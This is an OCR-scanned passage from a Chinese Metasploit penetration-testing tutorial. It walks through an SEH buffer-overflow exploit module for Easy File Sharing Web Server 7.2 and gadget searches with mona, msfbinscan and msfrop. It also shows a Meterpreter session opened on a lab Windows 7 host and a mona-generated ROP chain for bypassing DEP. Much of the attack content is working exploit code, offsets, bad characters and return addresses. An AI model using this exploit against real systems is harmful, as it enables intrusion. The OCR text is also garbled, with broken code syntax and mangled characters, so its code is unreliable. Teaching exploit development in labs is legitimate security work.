
&» do] p at ARRERA TF e d EAD RERA, HEADE A EUR 
pattern_create 工 具 创 建 的 无 用 数据 ， 然 后 是 HTTP/1.0NrNnNrNno 


1. Mona 脚 本 


Mona 脚 本 是 一 个 由 Python 编写 的 用 于 immunity 调 试 器 的 搬 件 ， 它 提供 了 大 量 用 于 渗透 的 功 
能 。 这 个 脚本 可 以 从 https://github.com/corelan/mona/blob/master/mona.py 下 载 。 插 件 的 安装 也 很 简 
单 ， 只 需要 将 这 个 脚本 放置 在 \Program FilesNmmunity Inc\Immunity Debugger PyCommands H 5 "F 
即 可 。 


现在 运行 ,mona modules 命 令 启 动 Mona， 使 用 Mona 分 析 DLL 文 件 ， 如 下 图 所 示 。 
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BADFOOD Base T Top T Size T Rebase | SafeSEH | ASIR | NXCompat | OS Dil | Version, Modulename & Path 

'BADF00D 

BADFOOD ^ 0x10000000 | Ox10050000 | 0x00050000 | False | False | False | False | False | -1.0- [ImageLoad.d11] (C:VEFS SoftwareVEasy File Sharing Web ServerVImageload.dll) 
—BADFO0D ^ 0x75320000 | 0x75455000 | 0x00135000 | True | True | True | True | True | 8.00.7600.16385 [urlmon.dll] (C: WiindowsVsysten32Vurlmon.dll) 

-BADFOOD ^ 0x73520000 | 0x73530000 | 0x00010000 | True | True | True | True | True | 6.1.7600.16385 [NLAapi.d11] (C: Windows Vsystem32 WLAapi.dl1) 

BADFOOD ^ 0x750c0000 | Ox751dc000 | 0x0011c000 | True | True | True | True | True | 6.1.7600.16385 [CRYPT32.d11] (C:\Windows\system32\CRYPT32.d11) 

-BADFO0D ^ 0x74920000 | 0x74964000 | 0x00044000 | True | True | True | True | True | 6.1.7600.16385 [DNSAPI.d11] (C:\Windows\system32\DNSAPI.d11) 

-BADFO0D ^ 0x002e0000 | 0x00325000 | 0x00045000 | True | True | False | False | False | 0.9.8k [SSLEAY32.dll] (C:VEFS Software\Easy File Sharing Web Server VSSLEAY32.dll) 
—BADFO0D ^ 0x75700000 | 0x757d4000 | Ox000d4000 | True | True | True | True | True | 6.1.7600.16385 [kerne132.d11] (C:\Windows\system32\kernel32.d11) 

-BADFO0D ^ 0x75570000 | 0x7561c000 | 0x000ac000 | True | True | True | True | True | 7.0.7600.16385 [nsvcrt.d11] (C: Windows Vsystem32Wnsvcrt.dll) 

-BADFO0D ^ 0x74£70000 | Ox74£7c000 | 0x0000c000 | True | True | True | True | True | 6.1.7600.16385 [CRYPTEASE.dll] (C: Windows Vsystem32VCRYPTBASE.d11) 

-BADFO0D 0x70550000 | Ox705cc000 | Ox0001cO00 | True | True | True | True | True | 6.1.7600.16385 [oledlg.d11] (C: Windows Vsystem32Voledlg.d11) 

-BADFO0D ^ 0x61c00000 | Ox61c99000 | 0x00099000 | False | False | False | False | False | 3.8.8.3 [sqglite3.dll] (C:VEFS SoftwarelEasy File Sharing Web Server Vsqlite3.dll) 

-BADFO0D ^ 0x73950000 | 0x739c3000 | 0x00013000 | True | True | True | True | True | 6.1.7600.16385 [dwmapi.dll] (C: Windows Vsystem32Vdwmapi.dll) 

-BADFO0D ^ 0x76ed0000 | 0x7700c000 | Ox0013cO00 | True | True | True | True | True | 6.1.7600.16385 [ntd11.d11] (C: WiindowsVSYSTEM32Wntdll.dll) 

—BADFO0D ^ Ox6d570000 | Ox6db82000 | 0x00012000 | True | True | True | True | True | 6.1.7600.16385 [pnrpnsp.dll] (C: WindowsVeysten32Vpnrpnsp.dll) 

-BADFO0D  0x6db60000 | Ox6db6d000 | Ox0000d000 | True | True | True | True | True | 6.1.7600.16385 [wshbth.d11] (C: Windows Vsystem32 Wshbth.dll) 

-BADFO0D ^ 0x74460000 | 0x74465000 | Ox00005000 | True | True | True | True | True | 6.1.7600.16385 [wshtcpip.dll] (C: WiindowsVSystem32Wishtcpip.dll) 

-BADFO0D ^ Ox005d0000 | 0x006e7000 | 0x00117000 | True | False | False | False | False | 0.9.8k [LIBEAY32.dll] (C:VEFS SoftwareVEasy File Sharing Web ServerVLIBEAY32.dll) 
-BADFO0D ^ 0x77020000 | 0x7702a000 | Ox0000a000 | True | True | True | True | True | 6.1.7600.16385 [LPK.d11] (C: Windows Vsystem32NLPK. dll) 

-BADFO0D ^ 0x757e0000 | 0x757£9000 | 0x00019000 | True | True | True | True | True | 6.1.7600.16385 [sechost.dll] (C: Windows VSYSTEM32Vsechost.dll) 

—BADFO0D ^ 0x75530000 | Ox75d29000 | Ox001f9000 | True | True | True | True | True | 8.00.7600.16385 [iertutil.dll] (C: Windows Vsystem32Mertutil.dll) 

BADFOOD ^ 0x75e80000 | 0x75£20000 | 0x000a0000 | True | True | True | True | True | 6.1.7600.16385 [ADVAPI32.d11] (C: Windows Vsystem32VADVAPI32 .dll) 

—BADFOOD 0x00400000 | Ox005c2000 | Ox001c2000 | False | False | False | False | False | 7.2.0.0 [fsws.exe] (C:VEFS SoftwarelEasy File Sharing Web Server\fsws .exe) 


由 上 图 可 知 ， 这 里 的 DLL 文件 很 少 ， 而 且 都 没有 受 SafeSEH 机 制 的 保护 。 利 用 这 些 文件 ， 就 
可 以 查找 POP/POP/RET 指 令 的 相关 地 址 。 


如 果 想 获取 关于 Mona 脚 本 的 更 多 信息 ， 请 访问 https://www.corelan.be/index. 
php/211/7/14/mona-py-the-manual/。 
2. msfbinscan 的 使 用 


可 以 使 用 msfbinscan 的 -p 参 数 轻松 地 找到 POP/POP/RI 
ImageLoad.dll 文 件 中 应 用 这 个 方法 的 结果 。 


T 指 令 序 列 。 下 面 给 出 了 在 


Lj 


rootükali:-4 msfbinscan -p /ImageLoad.dll 
[/ImageLoad.dll] 

0x1000108b pop ebp; pop ebx; ret 
0x10001274 pop ebp; pop ebx; ret 
0x10001877 pop esi; pop ebx; ret 
0x100018e0 pop esi; pop ebx; ret 
0OxlO001d9f pop ebp; pop ebx; ret 
0x100026e1 pop edi; pop ebx; ret 
0x1000283e pop edi; pop esi; ret 
0x100028ab pop edi; pop esi; ret 
0x100029b5 pop esi; pop ebx; ret 
0x10002b9b pop ebp; pop ebx; ret 
0x10002bc9 pop ebp; pop ebx; ret 
0x10002c0e pop edi; pop esi; ret 
0x10002c30 pop edi; pop esi; ret 
0x10002c52 pop edi; pop esi; ret 


0x10002c74 pop edi; pop esi; ret 
0x1000343c pop esi; pop ebx; ret 
0x10003452 pop esi; pop ebx; ret 
0x10003466 pop esi; pop ebx; ret 
0x1000349c pop esi; pop ebx; ret 
0x100034cc pop esi; pop ebx; ret 
0x100034ea pop esi; pop ebx; ret 
0x1000351a pop esi; pop ebx; ret 
0x10003548 pop esi; pop ebx; ret 
0x10003562 pop esi; pop ebx; ret 
0x1000358d pop esi; pop ebx; ret 
0x1000387b pop esi; pop ecx; ret 


让 我 们 使 用 一 个 安全 的 地 址 ， 排 除 掉 所 有 可 能 会 引起 HTTP 协 议 问 题 的 地 址 (例如 说 连续 不 
WTHIO )。 
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0x10019798 pop esi; pop ecx; ret 
0x100197b5 pop esi; pop ecx; ret 
0x10019821 pop edi; pop esi; ret 
0x1001986f pop edi; pop esi; ret 
0x10019882 pop edi; pop esi; ret 
0x10019964 pop edi; pop esi; ret 
0x10019993 pop ebx; pop ecx; ret 
0x10019a86 pop ebx; pop ecx; ret 
0Oxl0019aal pop ebx; pop ecx; ret 


我 们 将 会 使 用 0x10019798 作 为 PoOP/POP/RET 的 地 址 。 现在 已 经 有 了 两 个 用 来 编写 渗透 模块 
的 重要 组 件 , 一 个 是 偏 移 量 ,， 另 一 个 是 用 来 载 和 catch 块 的 地 址 ， 也 就 是 POP/POP/RET 指 令 地 址 。 
现在 就 差 一 条 短 跳 转 指令 了 一 一 用 来 载 和 人 下 一 条 SEH 记 录 的 地 址 ， 并 帮助 程序 跳 转 到 ShellCode。 
Metasploit 库 文件 的 内 置 功能 便 可 以 提供 短 跳 转 指 令 。 


3.3.4 编写 Metasploit 的 SEH 渗透 模块 


现在 我 们 已 经 拥有 了 用 于 渗透 目标 应 用 程序 的 全 部 重要 数据 ， 接 着 创建 Metasploit 中 的 渗透 
模块 ， 过 程 如 下 : 


require 'msf/core' 


class Metasploit4 « Msf::Exploit::Remote 


Rank - NormalRanking 


include Msf::Exploit::Remote::Tcp 
include Msf::Exploit::Seh 
def initialize(info - () 
super(update info(info, 
'Name' => 'Easy File Sharing HTTP Server 7.2 SEH Overflow', 
'Description' => %q{ 
This module demonstrate SEH based overflow example 

ys 


'Author' -» 'Nipun', 
'License' -» MSF LICENSE, 
'Privileged' -» true, 


'DefaultOptions' => 
( 


'EXITFUNC' -» 'thread', 
Er 
'Payload' I» 
{ 
'Space' -» 390, 
'BadChars' =S 


"\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e", 
}, 
'Platform' -» 'win', 
'Targets' => 
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[ 
[ 'Easy File Sharing 7.2 HTTP', ( 'Ret' => 0x10019798, 'Offset' 
=> 4061 ) J; 
15 
'DefaultOptions' => ( 
'RPORT' => 80 
} 
'DisclosureDate' => 'Dec 2 2015', 
'DefaultTarget' => 0)) 
end 
我 们 之 前 已 经 编写 过 各 种 模块 的 头 部 了 一 一 首先 引入 所 需 的 库 文件 ， 接 着 定义 类 和 模块 类 
型 一 一 这 和 之 前 完成 的 模块 是 一 样 的 。 我 们 在 初始 化 部 分 中 定义 了 名 字 、 描 述 、 作 者 信息 、 许 可 
Hd. 、 攻 击 载荷 选 项 、 漏 洞 泄 露 日 期 和 默认 目标 。 还 用 到 了 一 个 地 址 和 一 个 偏 移 量 : 地 址 是 
POP/POP/RET 指 令 的 地 址 0x10019798， 保 存在 变量 Ret (return address ) 中 ; 偏 移 量 4061 保 存 
在 变量 offset 中 。 这 两 个 变量 都 保存 在 rarget 字 段 中 。 我 们 之 所 以 使 用 4061 来 代替 4065， 是 
因为 Metasploit 会 自动 生成 一 个 到 ShellCode 的 短 跳 转 指令 。 因 此 ， 要 将 4065 字 节 的 地 址 向 前 移 4 


个 字 节 ， 这 样 就 可 以 把 短 跳 转 指令 放 到 原本 用 来 存放 下 一 条 SEH 记 录 地 址 的 位 置 。 

在 进行 更 深入 的 学 习 之 前 , 先 来 看 看 在 这 些 模块 中 使 用 到 的 重要 函数 。 我 们 之 前 已 经 看 过 了 
make nops, connect, qisconnect 和 handqler 四 个 函数 的 用 法 ， 下 面 给 出 [lgenerate seh. 
record () 函数 的 详细 信息 。 


A 9 E ox dt mH R 
generate seh record() /lib/msf/core/exploit/seh.rb 这 个 函数 提供 了 产生 SEHi 记 录 的 方法 


回 到 代码 : 


def exploit 
connect 
weapon - "HEAD " 
weapon «« make nops(target['Offset']) 
weapon «« generate seh record(target.ret) 
weapon «« make nops(19) 
weapon «« payload.encoded 
weapon << " HTTP/1.0\r\n\r\n" 
Sock.put (weapon) 
handler 
disconnect 
end 
end 


这 个 渗透 函数 首先 连接 目标 ， 然 后 产生 一 个 恶意 的 HEAD 请 求 ( 通过 向 HEAD 请 求 添加 4061 个 
NOP 实 现 )。 接 着 ， 使 用 generate_seh_record() 函数 生成 一 条 8 字 节 的 SEH 记 录 ， 其 中 的 前 4 
个 字 节 会 让 指令 跳 转 到 攻击 载荷 上 。 通 党 这 4 个 字 贡 包含 着 例如 "\xeb\x0A\x90\x90" 这 样 的 指 
令 ， 其 中 \xep 意 味 着 短 跳 转 指令 ，\x0A 表 示 要 跳 过 12 字 节 ，\x90\x90 NOP 指 令 则 作为 填充 ， 
保证 长 度 为 4 个 字 节 。 
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使 用 NASM shell 编 写 汇编 指令 


使 用 NASM shell 编 写 短 汇 编 代码 相当 方便 。 我 们 在 上 一 节 中 使 用 函数 generate_ 


seh record() 自动 创建 了 SEH 记 录 ， 并 且 只 使 用 了 简短 的 汇编 代码 


\xep\x0a 表 示 跳 过 12 


个 字 节 的 短 跳 转 指 令 。 不 过 当 我 们 要 手动 生成 SEH 记 录 时 ， 则 完全 不 需要 上 网 去 查找 操作 码 ， 只 


ii HINASM shell 就 可 以 轻松 地 编写 出 汇编 代码 。 


Em 
Ti 


在 上 一 个 示例 中 ,我 们 已 经 有 了 一 个 简单 的 汇编 调用 ， 就 是 JMP SHORT 12。 不 过 我 们 还 不 


知道 这 条 指令 的 操作 码 ， 因 此 使 用 NASM shell 来 找 出 这 个 操作 码 。 


rooteémm: /usr/share/metasploit-framework/tools/exploit# . 
l.rb 

nasm > jmp short 12 

00000000 EBOA jmp short Oxc 

nasm > 


/nasm shel 


由 上 图 可 知 ， 在 目录 /usrshare/Metasploit-ffamework/tools/exploit 中 运行 nasm_shellrb 脚 本 之 
后 ,就 可 以 通过 简单 地 输入 命令 获得 对 应 的 操作 码 了 。 这 一 次 得 到 的 操作 码 和 之 前 讨论 过 的 一 样 ， 
都 是 EB0A。 因 此 ， 在 之 后 所 有 的 示例 中 都 将 使 用 NASM shell， 这 可 以 节省 大 量 的 时 间 和 精力 。 


现在 回 到 主题 上 来 。Metasploit 允 许 我 们 使 用 generate_seh_record() 气 数 跳 过 提供 跳 转 


间 令 和 到 达 攻 击 载荷 的 字 节 数量 。 接 下 来 ,我 们 要 在 攻击 载荷 前 填充 一 些 数据 , 用 来 消除 影响 攻 
击 载荷 运行 的 不 利 因素 , 并 使 用 HTTP/1 .0\r\n\r\n 作 为 请 求 头 部 的 结束 部 分 。 最后, 将 保存 在 


变量 weapon 中 的 数据 发 送 到 目标 上 ， 然 后 调用 handler 方 法 来 检查 该 尝试 是 否 成 功 。 如 果 成 功 ， 


我 们 将 获得 控制 目标 的 权限 。 
下 面 来 运行 这 个 模块 ， 并 对 其 进行 分 析 。 


msf > use exploit/windows/masteringmetasploit/example80-3 

msf exploit(example80-3) > set RHOST 192.168.10.104 

RHOST => 192.168.10.104 

msf exploit(example88-3) > set payload windows/meterpreter/bind tcp 
payload => windows/meterpreter/bind tcp 

msf exploit(example88-3) » show options 


Module options (exploit/windows/masteringmetasploit/example80-3): 


RHOST 192.168. 10.104 yes The target address 
RPORT 80 yes The target port 


Payload options (windows/meterpreter/bind tcp): 


Exploit target: 


0 Easy File Sharing 7.2 HTTP 


msf exploit(example88-3) > exploitli 


Name Current Setting Required Description 

EXITFUNC process yes Exit technique (Accepted: '', seh, thread, 
LPORT 4444 yes The listen port 

RHOST 192.168.10.104 no The target address 


process, none) 
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在 设置 好 所 有 所 需 选 项 之 后 ， 我 们 就 做 好 对 系统 进行 渗透 的 准备 了 。 下 面 来 看 看 输入 
exploit 命 令 之 后 会 发 生 什么 。 


Imsf exploit(example88-3) > exploit 


[*] Started bind handler 

[*] Sending stage (957487 bytes) to 192.168.10.104 

[*] Meterpreter session 5 opened (192.168.10.118:41242 
-» 192.168.10.104:4444) at 2016-04-14 23:41:01 -0400 


meterpreter > sysinfo 


[Computer : WIN-40JU8043FH2 
0S : Windows 7 (Build 7600). 
Architecture : x86 
System Language : en US 
Domain : WORKGROUP 
Logged On Users : 4 
Meterpreter : x86/win32 
di. 


我 们 成 功 地 渗透 了 运行 着 Windows 7 的 目标 系统 。 现 在 你 知道 在 Metasploit 中 创建 一 个 SEH 
模块 是 多 么 简单 的 事情 了 吧 ! 在 下 一 方 中 ， 我 们 会 再 深入 一 些 ， 人 研究 如 何 绕 过 DEP 之 类 的 安全 
机 制 。 


想 获 取 更 多 关于 SEH mixin 的 详细 信息 ， 请 访问 https:/github.com/rapid7/ 
metasploit-framework/wiki/How-to-use-the-Seh-mixin-to-exploit-an-exception-handler. 
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数据 执行 保护 ( Data Execution Prevention, DEP ) 是 一 种 将 特定 内 存 区 域 标 记 为 不 可 执行 的 
保护 机 制 ， 这 种 机 制 会 导致 我 们 在 渗透 过 程 中 无 法 执行 ShellCode。 因 此 ， 即 使 我 们 可 以 改写 EIP 
寄存 需 中 的 内 容 并 成 功 地 将 ESP 指 向 了 ShellCode 的 起 始 地 址 ， 也 无 法 执行 攻击 载荷 。 这 是 因为 
DEP 的 存在 阻止 了 内 存 中 可 写 区 域 (例如 栈 和 堆 ) 中 数据 的 执行 。 在 这 种 情况 下 ， 我 们 必须 使 用 
可 执行 区 域 中 的 现存 指令 实现 预期 的 功能 一 一 可 以 通过 将 所 有 的 可 执行 指令 放置 成 一 个 可 以 让 
跳 转 跳 到 ShellCode 的 顺序 来 实现 这 一 目的 。 


绕 过 DEP 的 技术 被 称 为 返回 导向 编程 (Return Oriented Programming, ROP ) 技术 ， 它 不 同 于 
通过 覆盖 改写 EP 内 容 ， 并 跳 转 到 ShellCode 栈 溢出 的 普通 方法 。 当 DEP 启 用 之 后 ， 我 们 将 无 法 使 
用 这 种 技术 ， 因 为 栈 中 的 数据 是 不 能 执行 的 。 因 此 我 们 不 再 跳 转 到 Shellcode ， 而 是 调用 第 一 个 
ROP 指 令 片 段 (gadget )。 这 些 指 令 片 段 会 共同 构成 一 个 链 式 结构 , 一 个 指令 片段 会 返回 下 一 个 指 
令 片 段 ， 而 不 执行 栈 中 的 任何 代码 。 


我 们 将 在 下 一 节 看 到 如 何 查找 ROP 指 令 片 段 。 它 通过 寄存 器 完成 各 种 操作 的 指令 , 后 面 都 以 
一 条 return ( RET ) 指令 结尾 。 想 要 找到 ROP 指 令 片 段 ， 最 好 的 方法 就 是 在 载 和 的 模块 (DLL ) 中 
查找 。 这 些 指令 片段 依次 从 栈 中 执行 ， 并 返回 下 一 个 地 址 ， 这 种 组 合 方式 被 称 为 ROP 链 。 
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我 们 现在 已 经 有 了 一 个 有 栈 溢出 漏洞 的 示例 应 用 程序 。 将 EIP 的 偏 移 量 改 写 为 2006。 下 面 给 
出 了 使 用 Metasploit 成 功 渗透 这 个 程序 之 后 的 显示 。 


msf exploit(example9999-1) > exploit 


[*] Started bind handler 
[*] Sending stage (957487 bytes) to 192.168.10.107 


[*] Meterpreter session 1 opened (192.168.10.118:46127 -» 192.168.10.107:4444) a 
t 2016-04-15 01:21:27 -0400 


meterpreter > Bj 


我 们 已 经 轻松 地 获得 了 目标 的 Meterpreter 控 制 权 限 。 接 下 来 在 目标 的 Windows 操 作 系统 中 打 
开 DEP 保 护 ， 这 个 保护 可 以 在 系统 属性 (system property ) 的 高 级 系统 属性 ( advanced system 
property ) 中 打开 ， 如 下 图 所 示 。 


gO- » Control Panel » All Control Panel Items » System 


| 好 | 
Control Panel Home System Properties bd Performance Options [28 


Visual Effects | Advanced | Data Execution Prevention 


Computer Name | Hardware. 


y» Device Manager 


Advanced |System Protection | Remote 


BE eene You must be logged on as an Administrator to make most of these changes 


Po " Data Execution Prevention (DEP) helps protect 
z erformance 3 
y System protection against damage from viruses and other security 


= Visual effects, processor scheduling. memory usage. and virtual memory threats. How does it work? 
"y Advanced system settings 


7) Turn on DEP for essential Windows programs and services 
Settings... 


Q) Turn on DEP for all programs and services except those I 
System Properties 


xS | select: 


o The changes you have made require you to restart your Settings... 
LJ computer before they can take effect. TE 


xc] 


Settings... 
L 
Environment Variables... 
Add... Remove 
Your computer's processor supports hardware-based DEP. 
FE 
Computer description: 
See also 
Workgroup: WORKGROUP EC ox ji cn ][ appy |] 
Action Center 


接 下 来 选中 “为 除 选中 项 以 外 的 所 有 程序 和 服务 开启 DEP 保 护 ”( Turn on DEP for all programs 


and services except those I select ) 来 启动 DEP， 然 后 重新 启动 我 们 的 系统 ， 尝 试 渗透 同一 个 漏洞 ， 
结果 如 下 图 所 示 。 


msf exploit(example9999-1) > exploit 


[*] Started bind handler 
[*] Exploit completed, but no session was created. 


这 次 渗透 失败 了 ， 因 为 ShellCode 并 没有 执行 。 
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可 以 从 以 下 地 址 下 载 示例 程序 : http;/www.thegreycorner.com/21/12/introducing- 
vulnserver.html 


o ctu ic E 
持 DEP 保 护 运 行 ， 将 这 个 有 漏洞 的 应 用 程序 附加 到 调试 器 中 ， 显 示 的 结果 如 下 图 所 示 。 


Base i Top i Size i Rebase ! SafeSEH ! ASLR ! NXCompat ! OS D11 i Version, Modulenane & Path 

9x77480000 ! 0x7748a800 ! ØxAAAAaBAA ! True ! True | True | True | True | 6.1.7600.16385 [LPK.d11] €C:sMindousNssuysten32NLPK.d115 
Bx77490BB88 ! 8x77496000 ! ØxAABA6BAA ! True i True i True | True i Irue H 6- 1.76080.16385 INSI.d11] (C:MindousNsysten32NNSI.d1ll» 
Bx62590888 : oen] H 8x88888808 ; False ! False i False ! False i i .8- H pepe ho sfunc.dll> 
@x76470888 ! 8x765 8x88 ccORR ; True i Irue i True | True | 6.1. NMSCIF . db 
0x75550080 0x7 5692000 i 8x8004a800 Irue Irue Irue Irue t 6.1. S ed d11) 
gx74eaDBBB8 } Ax74edc888 ! Bx9683c868 ! True True Tru ru 6.1.76 2wnsusoc 
Bx774aBBB88 ; 8x7753d880 ! Bx9889d668 ;| True i True i True ! True i 1.0626 REPNE ap 
8x76540888 i 8x7658e8088 ! eee i Irue i True i True | True 6.1. Pa. n32*GDI32 .d11 
BxBB40DBBB ! (x00407008 ! 007800 ! False ! False | False | False p E ee end r.exe 
9x778090000 ! (x77164000 ! 000004000 ! True ! True i True ! True 6.1.76 en32Nkerne132.d115» 
x77200000 ! 8x772ac800 | Gx@00ac800 ! True | True True ! True 7.0.7600. S E H 5'Nsysteni32Nnsucrt.dl 
8x765980888 ! 0x766598880 ! 8x888c9808 ; True i True i True ! True i True | 6.1.7600.16385 [user32. dn C:\Windows\sys ten32wus er32.d11» 
8x773180800 : 0x7744c880 ! Bx8013c800 ; True i True i True ! True i True i 6.1.7688.16385 Intdll.d11] (C:sMindoussSYSTEM32wntdll.d115 


和 之 前 一 样 ， 输 入 命令 mona modules 启 用 Mona 脚 本 ， 就 可 以 找到 所 有 模块 的 信息 。 不 过 
为 了 构建 ROP 链 ,需要 在 这 些 DLL 文 件 中 找到 所 有 可 执行 ROP 的 指令 片段 。 


3.4.1 使 用 msfrop 查找 ROP 指令 片段 


Metasploit 提 供 了 一 款 可 以 查找 ROP 指 令 片 段 的 便利 工具 : msfrop。 这 款 工具 不 仅 可 以 列 出 
所 有 ROP 指 令 片段 ， 还 可 以 在 这 些 指令 片段 中 找到 符合 我 们 需求 的 部 分 。 下 面 使 用 msfrop 查 找 
一 条 可 以 实现 ECX 寄 存 器 出 栈 操作 的 指令 片段 ， 过 程 如 下 图 所 示 。 


[root@kali:~# msfrop -v -s "pop ecx" msvcrt.dll ii 


使 用 -s 参 数 进行 查找 ， 使 用 -v 实 现 详 细 输 出 之 后 ， 我 们 首先 得 到 了 所 有 使 用 POP ECX 操 作 
的 指令 片段 。 下 图 为 操作 结果 。 


[*] gadget with address: 0x6ffdbld5 matched 
Ox6ffdbild5: pop ecx 
Ox6ffdbid6: ret 


[*] gadget with address: Ox6ffdf68f matched 
Ox6ffdf68f: pop ecx 
Ox6ffdf690: ret 


[*] gadget with address: Ox6ffdfc9d matched 
Ox6ffdfc9d: pop ecx 
Ox6ffdfc9e: ret 


我 们 现在 已 经 找到 了 大 量 可 以 用 来 完成 POP ECX 操 作 的 指令 片段 ,不 过 为 了 构建 一 个 可 以 成 
功 绕 过 DEP 保 护 机 制 的 Metasploit 渗 透 模 块 ， 我 们 需要 在 栈 中 建立 一 个 不 会 执行 任何 实际 操作 的 
ROP 指 令 片 段 链 。 下 图 给 出 了 使 用 ROP 绕 过 DEP 保 护 的 原理 。 
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0x000000 0x000000 0x000000 


我 们 的 变量 
所 占 的 空间 


(AMARAS 
OxDEADBEEF 


AAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAA 


POP ECX 
AAAAAAAA RET 
ROP 指 令 片 段 1 
ROP 指 令 片 段 2 ADD ECX,80 
ROP 指 令 片 段 3 d 
LJ 


POP EBX 
RET 


OxFFFFFFFF OxFFFFFFFF OxFFFFFFFF 


左 侧 是 一 个 正常 程序 的 分 布 图 ; 中 间 是 一 个 被 缓冲 区 溢出 漏洞 攻击 过 的 程序 分 布 图 , 其 中 的 
EIP 寄 存 器 已 经 被 覆盖 改写 ; 右 侧 是 一 个 用 来 绕 过 DEP 机 制 的 分 布 图 一 一 这 里 并 没有 使 用 JMP ESP 
的 地 址 ， 而 是 使 用 ROP 指 令 片 段 的 地 址 改写 了 EIP 中 的 内 容 ， 后 面 紧 接着 另 一 个 ROP 指 令 片 段 ， 
直到 ShellCode 成 功 执 行 。 


那么 如 何 才能 绕 过 硬件 启用 的 DEP 保 护 呢 ? 


答案 很 简单 ,技巧 就 是 将 这 些 ROP 指 令 片 段 连 成 一 个 链 , 以 便 调 用 VirtualProtect () 函数 。 
它 是 一 个 内 存 保护 函数 ， 可 以 让 栈 中 数据 执行 ， 从 而 使 ShellCode 执 行 。 下 面 来 看 一 下 如 何在 受 
DEP 保 护 的 情况 下 进行 渗透 。 


(1) 计算 到 EIP 寄 存 器 的 偏 移 量 。 
(2) 使 用 第 一 个 ROP 指 令 片 段 覆 盖 改 写 寄存 器 。 
(3) 使 用 其 他 的 指令 片段 持续 覆盖 改写 寄存 器 ， 直 到 ShellCode 可 执行 。 


(4) 执行 ShellCode。 


3.4.2 ”使 用 Mona 创建 ROP 链 


通过 使 用 immunity 调 试 器 中 的 Mona 脚 本 , 不 仅 可 以 找到 ROP 指 令 片 段 , 还 可 以 创建 整个 ROP 
链 ， 如 下 图 所 示 。 
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ØBADFƏAD ROP generator finished 

ØBADFOAD 

ØBADFƏƏD [+] Preparing output file 'stackpivot.txt' 

ØBADFAAD — Resetting logfile stackpivot.txt 

ØBADFƏAD [+] Writing stackpivots to file stackpivot.txt 

ØBADFAAD Wrote 16216 pivots to file 

ØBADFƏAD [+] Preparing output file 'rop suggestions.txt"' 

ØBADFƏAD — 《Resetting logfile rop suggestions.txt 

ØBADFƏƏD [+] Writing suggestions to file rop suggestions.txt 
ØBADFƏAD Wrote 6579 suggestions to file 

BBADFBBD [+] Preparing output file 'rop.txt' 

BBhDFBBD 一 《Resetting logfile rop.txt 

BBhDFBBD [+] Writing results to file rop.txt 448599 interesting gadgets) 
ØBADFƏAD Wrote 48599 interesting gadgets to file 

ØBADFƏAD [+] Writing other gadgets to file rop.txt 455186 gadgets) 
BBhDFBBD Wrote 55186 other gadgets to file 

BBhDFBBD Done 

BBhDFBBD 

BBhDFBBD [+] This mona.py action took 8:03:43.923088 


Imona rop -m *.dll -cp nonull 
在 imnmunity 调 试 器 的 命令 行 中 使 用 命令 !mona rop -m *.dll -cp nonull 就 可 以 找到 所 
有 关于 ROP 代 码 片 段 的 信息 。 下 图 给 出 了 使 用 Mona 肢 本 产生 的 文件 。 


Name Date modified Type Size 
Í Libs 4/26/2016 10:18 PM File folder 
J. PyCommands 4/26/2016 10:18 PM File folder 
| rop. progress vulnserver.exe 4052 4/26/2016 10:21 PM Text Document 8 KB 
他] ImmunityDebugger 4/26/2016 10:33 PM Configuration setti... 9 KB 
| rop 4/26/2016 10:21 PM Text Document 12,624 KB 
rop chains 4/26/2016 10:21 PM Text Document 19 KB 
rop. suggestions 4/26/2016 10:21PM Text Document 747 KB 
| stackpivot 4/26/2016 10:21 PM Text Document 2,033 KB 
vulnserver.udd 4/26/2016 10:33 PM UDD File 36 KB 


我 们 获得 了 一 个 名 为 rop_chains.txt 的 文件 ， 这 个 文件 中 包含 了 可 以 直接 用 于 渗透 模块 的 完整 
ROP 链 。 这 些 ROP 链 使 用 Python、C 和 Ruby 语 言 编 写 而 成 ， 可 以 在 Metasploit 中 使 用 。 我 们 只 需 将 
这 个 ROP 链 复制 到 我 们 的 渗透 模块 中 即 可 。 


为 了 创建 一 个 可 以 触发 VirtualProtect () 函数 的 ROP 链 ， 需 要 对 寄存 器 进行 如 下 设置 。 


Register setup for VirtualProtect() : 
EAX = NOP (0x90909090) 

ECX = lpoldProtect (ptr to W address) 
EDX = NewProtect (0x40) 

EBX = dwSize 

ESP = lPAddress (automatic) 

EBP = ReturnTo (ptr to jmp esp) 

ESI = ptr to VirtualProtect() 

EDI = ROP NOP (RETN) 


下 图 给 出 了 使 用 Mona 脚 本 创建 的 ROP 链 。 


ion 
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def create rop chain() 

# rop chain generated with mona.py - www.corelan.be 

Top-9adgers 一 
Ox76db6cd8, # POP ECX # RETN [RPCRT4.d11] 
0x6250609c, # ptr to &virtualProtect() [IAT essfunc.d11] 
Ox7648fd52, # MOV ESI,DWORD PTR DS:[ECX] # ADD DH,DH # RETN [MSCTF.d11] 
O0x7721d5ef, # POP EBP # RETN [msvcrt.dl1] 
Ox625011bb, # & jmp esp [essfunc.d11] 
Ox76db6d7f, # POP EAX # RETN [RPCRT4.d11] 
Oxfffffdff, # value to negate, will become 0x00000201 
Ox76ddd3c9, # NEG EAX # RETN [RPCRTA4.d11] 
Ox7648f9f1, # XCHG EAX,EBX # RETN [MSCTF.d11] 
Ox76db6d7f, # POP EAX # RETN [RPCRTA4.d11] 
OxffffffcO, # value to negate, will become 0x00000040 
0x76472fdO0, # NEG EAX # RETN [MSCTF.d11] 
Ox770cbd3a, # XCHG EAX,EDX # RETN [kernel32.d11] 
0x77268a7e, # POP ECX # RETN [msvcrt.dl11] 
0x74ed7f21, # &writable location [mswsock. d11] 
Ox76dddcbe, # POP EDI # RETN [RPCRTA4.d11] 
0x765c4804, # RETN (ROP NOP) [user32.d11] 
0x76db6d7f, # POP EAX # RETN [RPCRTA4.d11] 
0x90909090, # nop 
0x77265cf4, # PUSHAD # RETN [msvcrt.dll] 

].flatten.pack("v*") 

return rop gadgets 

end 


我 们 已 经 完成 了 create_rop_chain 函 数 的 编写 ， 并 将 其 保存 到 了 rop_chains.txt 文 件 中 。 现 
在 只 需 将 这 个 函数 复制 到 渗透 模块 中 即 可 。 


3.4.3 ”编写 绕 过 DEP 的 Metasploit 渗透 模块 


本 节 的 目标 还 是 之 前 那个 因 开启 了 DEP 保 护 而 导致 渗透 失败 的 应 用 程序 。 这 个 程序 运行 在 
